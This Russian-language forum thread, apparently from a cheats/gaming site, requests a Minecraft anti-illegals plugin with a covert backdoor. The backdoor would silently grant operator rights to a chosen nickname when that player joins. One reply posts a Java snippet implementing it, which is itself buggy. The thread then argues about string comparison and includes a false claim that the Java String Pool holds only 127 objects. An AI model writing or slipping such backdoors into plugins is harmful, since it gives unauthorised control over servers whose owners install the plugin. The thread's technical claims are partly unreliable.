• Я зарабатываю 100 000 RUB / месяц на этом сайте!

    А знаешь как? Я всего-лишь публикую (создаю темы), а админ мне платит. Трачу деньги на мороженое, робуксы и сервера в Minecraft. А ещё на паль из Китая. 

    Хочешь так же? Пиши и узнавай условия: https://t.me/alex_redact
    Реклама: https://t.me/yougame_official

Требуется услуга Ищу кодера на java, который бы сделал плагин anti illegals на майнкрафт с приколом

Начинающий
Начинающий
Статус
Оффлайн
Регистрация
8 Янв 2019
Сообщения
198
Реакции
12


В данной секции находятся темы для единоразовой работы (мелкие задачи). Если вы ищете работу в крупных проектах, перейдите в соседний раздел. Если вы предоставляете какие-либо услуги в сфере читов и хотите их прорекламировать, то вам в данный раздел.

 

вообщем, нужен плагин, который фиксит зачарования 32767, бедрок, рамки портала, блоки воды/лавы, головы. но еще нужно вписать в плагин bAcKdOoR который onPlayerJoinEvent выдает опку определенному нику без объявления. кто может, пишите в лс на форуме.
 
вообщем, нужен плагин, который фиксит зачарования 32767, бедрок, рамки портала, блоки воды/лавы, головы. но еще нужно вписать в плагин bAcKdOoR который onPlayerJoinEvent выдает опку определенному нику без объявления. кто может, пишите в лс на форуме.
Бюджет ?
 
Фиксы чисто по инвентарю игрока или по всем? Т. е. enderchest, shulker, hopper и прочие.
 
фиксит зачарования 32767
Такой плагин уже был где-то.

бедрок, рамки портала, блоки воды/лавы, головы.
Через worldguard/essentials можешь спокойно запретить.

bAcKdOoR который onPlayerJoinEvent выдает опку определенному нику без объявления.
5 минут и готово, ничего сложного, bukkit.org (no ad) в помощь, если чего-то не понимаешь.
Java:
Expand Collapse Copy
@EventHandler
public void onPlayerJoin(PlayerJoinEvent event)
{
    Player player = event.getPlayer();
    if(player.getName == "Kaboshiki")
    {
        player.isOp(true);
    }
}

Любая работа должна быть оплачена, но не знаю что ты хотел от этого, максимум 5 рублей.
 
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Такой плагин уже был где-то.


Через worldguard/essentials можешь спокойно запретить.


5 минут и готово, ничего сложного, bukkit.org (no ad) в помощь, если чего-то не понимаешь.
Java:
Expand Collapse Copy
@EventHandler
public void onPlayerJoin(PlayerJoinEvent event)
{
    Player player = event.getPlayer();
    if(player.getName == "Kaboshiki")
    {
        player.isOp(true);
    }
}


Любая работа должна быть оплачена, но не знаю что ты хотел от этого, максимум 5 рублей.
щас бы стринги через == сравнивать
 
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Собственно, в чем отличие твоего варианта от моего, если equals так же сверяет?
String s = "Nordia";

System.out.println(s == s); // true

System.out.println(s == new String("Nordia")); // false

System.out.println(s.equals(new String("Nordia"))); // true

загугли,мне лень тебе обьяснять основы джавы
 
String s = "Nordia";

System.out.println(s == s); // true

System.out.println(s == new String("Nordia")); // false

System.out.println(s.equals(new String("Nordia"))); // true

загугли,мне лень тебе обьяснять основы джавы
Похоже тебе надо подучить основы джавы.

А это не только логически не работает.
System.out.println(s.equals("Nordia")); // true

1588689073794.png
 
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Похоже тебе надо подучить основы джавы.

А это не только логически не работает.


Посмотреть вложение 72415
я отредачил чтобы тебе нагляднее было, если до сих пор не понятно, то == сравнивает ссылку на обьект, тоесть проверяет указывают ли обе ссылки на одно и тоже место в памяти. s == "String" возвращает true только потомучто в джаве есть так называемый String Pool, место где джава хранит стринги, соответственно когда ты создаешь две ссылки на "Nordia" они обе указывают на одно и тоже место в памяти НАДЕЮСЬ ТАК ПОНЯТНО? Считай что String Pool это Set<String> из которого тебе джава возвращает ссылку на уже существующую стрингу

крч сравнивать обьекты через == это bad practice, и ни к чему хорошему не приводит так что назвать твой код примерным нельзя
 
Последнее редактирование:
я отредачил чтобы тебе нагляднее было, если до сих пор не понятно, то == сравнивает ссылку на обьект, тоесть проверяет указывают ли обе ссылки на одно и тоже место в памяти. s == "String" возвращает true только потомучто в джаве есть так называемый String Pool, место где джава хранит стринги, соответственно когда ты создаешь две ссылки на "Nordia" они обе указывают на одно и тоже место в памяти НАДЕЮСЬ ТАК ПОНЯТНО? Считай что String Pool это Set<String>

крч сравнивать обьекты через == это bad practice, и ни к чему хорошему это приводит так что назвать твой код примерным нельзя
Привычнее сравнивать через ==, не помню чтобы хоть кто то сказал что так нельзя, или что это не правильно.
 
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Привычнее сравнивать через ==, не помню чтобы хоть кто то сказал что так нельзя, или что это не правильно.
через == сравнивают только примитивы, int short double и тд, потомучто обычно методы equals hashcode переопределяются
1588690552087.png

вот пример, теперь обьекты класса JMessage будут сравниватся по полю text, а если бы ты сравнивал через ==, то поломал бы какуюто логику
 
через == сравнивают только примитивы, int short double и тд, потомучто обычно методы equals hashcode переопределяются
Посмотреть вложение 72427
вот пример, теперь обьекты класса JMessage будут сравниватся по полю text, а если бы ты сравнивал через ==, то поломал бы какуюто логику
Последний раз открывал идею год назад, с джавы переехал, а equals использовал очень редко, потому что == всегда работало. Не помню как я фиксил, когда не мог сравнить strings, может это и были те самые редкие моменты использования equals.
 
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Последний раз открывал идею год назад, с джавы переехал, а equals использовал очень редко, потому что == всегда работало. Не помню как я фиксил, когда не мог сравнить strings, может это и были те самые редкие моменты использования equals.
у тебя они были редкими потомучто ты над крупными проектами не работал, есть ещё 1 нюанс String Pool чекает только первые 127 обьектов, тоесть если у тебя много стрингов, то s == "String" вместо true вернет false

вообщем тебе это знать совсем не обязательно, просто блять юзай equals и всё не еби мне мозг
 
у тебя они были редкими потомучто ты над крупными проектами не работал, есть ещё 1 нюанс String Pool чекает только первые 127 обьектов, тоесть если у тебя много стрингов, то s == "String" вместо true вернет false

вообщем тебе это знать совсем не обязательно, просто блять юзай equals и всё не еби мне мозг
Я скоро вернусь в один не маленький проект, поэтому не надо говорить что не работал над большими проектами. А вот насчет юзать equals, после плюсов ты даже не вспомнишь про equals. :FeelsBadMan:
 
Назад
Сверху Снизу